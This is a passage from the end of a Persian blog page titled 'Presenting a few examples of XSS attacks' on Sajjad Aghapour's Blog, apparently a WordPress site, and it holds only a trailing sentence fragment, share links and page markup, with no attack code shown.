مناسب خود استفاده کنید…</p> <br /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/sajjadaghapour.wordpress.com/226/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/sajjadaghapour.wordpress.com/226/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/sajjadaghapour.wordpress.com/226/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/sajjadaghapour.wordpress.com/226/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/sajjadaghapour.wordpress.com/226/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/sajjadaghapour.wordpress.com/226/"></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/sajjadaghapour.wordpress.com/226/"></a> </article> </main></body></html>

Sajjad Aghapour's Blog

ارائه چند مثال از حملات XSS